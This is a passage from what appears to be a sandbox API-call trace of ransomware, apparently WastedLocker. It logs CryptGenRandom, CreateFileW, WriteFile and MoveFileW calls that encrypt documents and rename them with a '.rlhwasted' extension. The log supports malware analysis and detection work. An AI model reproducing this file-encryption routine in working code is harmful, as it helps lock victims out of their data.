dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0192.238] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.238] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0192.239] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0192.239] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.302] SetEndOfFile (hFile=0x124) returned 1 [0192.306] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0192.306] CloseHandle (hObject=0x124) returned 1 [0192.339] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fd458 | out: hHeap=0x6b0000) returned 1 [0192.339] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fd7e0 | out: hHeap=0x6b0000) returned 1 [0192.339] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0192.340] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0192.340] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.340] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\StaA7M8JtJc.odp") returned 59 [0192.340] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x280) returned 0x6ee458 [0192.340] lstrcpyW (in: lpString1=0x6ee4ce, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0192.340] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x708d90 [0192.340] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0192.341] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x708d90 | out: pbBuffer=0x708d90) returned 1 [0192.341] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.341] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\StaA7M8JtJc.odp.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\staa7m8jtjc.odp.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0192.343] WriteFile (in: hFile=0x124, lpBuffer=0x708d90*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x708d90*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0192.345] SetEndOfFile (hFile=0x124) returned 1 [0192.345] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.345] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0192.345] lstrcpyW (in: lpString1=0x6ee4ce, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0192.345] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\StaA7M8JtJc.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\staa7m8jtjc.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\StaA7M8JtJc.odp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\staa7m8jtjc.odp.rlhwasted")) returned 1 [0192.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\StaA7M8JtJc.odp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\staa7m8jtjc.odp.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0192.346] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0192.346] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xfd1c [0192.346] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfd1c) returned 0x6a0000 [0192.346] CloseHandle (hObject=0x110) returned 1 [0192.412] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0192.413] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f98) returned 1 [0192.414] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x1b8, pbBuffer=0x6e89c0 | out: pbBuffer=0x6e89c0) returned 1 [0192.414] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0192.414] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f98) returned 1 [0192.415] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0192.415] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0192.428] SetEndOfFile (hFile=0x124) returned 1 [0192.431] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0192.431] CloseHandle (hObject=0x124) returned 1 [0192.437] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0192.437] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fd998 | out: hHeap=0x6b0000) returned 1 [0192.437] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f98) returned 1 [0192.438] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0192.438] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0192.438] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VA4.pptx") returned 52 [0192.438] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x272) returned 0x6ee458 [0192.438] lstrcpyW (in: lpString1=0x6ee4c0, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0192.438] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0192.438] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f98) returned 1 [0192.439] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0192.439] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0192.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VA4.pptx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\va4.pptx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0192.440] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0192.442] SetEndOfFile (hFile=0x124) returned 1 [0192.442] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.442] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0192.442] lstrcpyW (in: lpString1=0x6ee4c0, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0192.442] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VA4.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\va4.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VA4.pptx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\va4.pptx.rlhwasted")) returned 1 [0192.444] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VA4.pptx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\va4.pptx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0192.444] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0192.444] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x2d01 [0192.444] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2d01) returned 0x6a0000 [0192.444] CloseHandle (hObject=0x128) returned 1 [0192.449] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0192.449] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f98) returned 1 [0192.450] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x1b8, pbBuffer=0x6e89c0 | out: pbBuffer=0x6e89c0) returned 1 [0192.451] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0192.451] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0192.500] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0192.500] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.512] SetEndOfFile (hFile=0x124) returned 1 [0192.514] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0192.514] CloseHandle (hObject=0x124) returned 1 [0192.586] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0192.586] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f03f8 | out: hHeap=0x6b0000) returned 1 [0192.586] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0192.588] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0192.588] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.588] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xusJt-1yw5rMA.ods") returned 61 [0192.588] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x284) returned 0x6ee458 [0192.588] lstrcpyW (in: lpString1=0x6ee4d2, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0192.588] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0192.588] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0192.589] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0192.589] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.589] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xusJt-1yw5rMA.ods.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xusjt-1yw5rma.ods.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0192.597] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0192.599] SetEndOfFile (hFile=0x124) returned 1 [0192.599] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.599] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0192.599] lstrcpyW (in: lpString1=0x6ee4d2, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0192.599] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xusJt-1yw5rMA.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xusjt-1yw5rma.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xusJt-1yw5rMA.ods.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xusjt-1yw5rma.ods.rlhwasted")) returned 1 [0192.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xusJt-1yw5rMA.ods.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xusjt-1yw5rma.ods.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0192.605] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0192.605] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xbcb4 [0192.605] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbcb4) returned 0x6a0000 [0192.605] CloseHandle (hObject=0x108) returned 1 [0192.613] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0192.614] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0192.615] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0192.615] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.615] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0192.616] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0192.616] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.723] SetEndOfFile (hFile=0x124) returned 1 [0192.725] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0192.725] CloseHandle (hObject=0x124) returned 1 [0192.728] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0192.728] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f9500 | out: hHeap=0x6b0000) returned 1 [0192.729] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0192.730] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0192.730] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.730] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZXTkq.pdf") returned 53 [0192.730] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x274) returned 0x6ee458 [0192.730] lstrcpyW (in: lpString1=0x6ee4c2, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0192.730] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0192.730] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0192.731] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0192.731] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.731] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZXTkq.pdf.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zxtkq.pdf.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0192.732] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0192.733] SetEndOfFile (hFile=0x124) returned 1 [0192.733] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.734] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0192.734] lstrcpyW (in: lpString1=0x6ee4c2, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0192.734] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZXTkq.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zxtkq.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZXTkq.pdf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zxtkq.pdf.rlhwasted")) returned 1 [0192.735] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZXTkq.pdf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zxtkq.pdf.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0192.735] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0192.735] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x14bfd [0192.735] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14bfd) returned 0xb00000 [0192.739] CloseHandle (hObject=0x110) returned 1 [0192.831] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0192.833] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0192.833] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0192.833] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0192.836] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0192.836] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0192.847] SetEndOfFile (hFile=0x124) returned 1 [0192.850] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fd458 | out: hHeap=0x6b0000) returned 1 [0192.850] CloseHandle (hObject=0x124) returned 1 [0192.852] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0192.852] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f0588 | out: hHeap=0x6b0000) returned 1 [0192.852] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0192.854] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0192.854] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0192.854] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 71 [0192.854] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x298) returned 0x6ee458 [0192.854] lstrcpyW (in: lpString1=0x6ee4e6, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0192.854] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fd458 [0192.854] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0192.855] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6fd458 | out: pbBuffer=0x6fd458) returned 1 [0192.855] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0192.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0192.868] WriteFile (in: hFile=0x124, lpBuffer=0x6fd458*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6fd458*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0192.870] SetEndOfFile (hFile=0x124) returned 1 [0192.870] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.870] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fd458 | out: hHeap=0x6b0000) returned 1 [0192.870] lstrcpyW (in: lpString1=0x6ee4e6, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0192.870] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.rlhwasted")) returned 1 [0192.872] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0192.872] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0192.872] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xe2 [0192.872] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe2) returned 0x6a0000 [0192.872] CloseHandle (hObject=0x128) returned 1 [0192.881] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0192.881] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0192.881] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0192.881] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0192.882] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0192.882] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0192.891] SetEndOfFile (hFile=0x124) returned 1 [0192.894] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fd458 | out: hHeap=0x6b0000) returned 1 [0192.894] CloseHandle (hObject=0x124) returned 1 [0192.905] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0192.905] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edeb0 | out: hHeap=0x6b0000) returned 1 [0192.905] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0192.914] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0192.914] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.914] lstrlenW 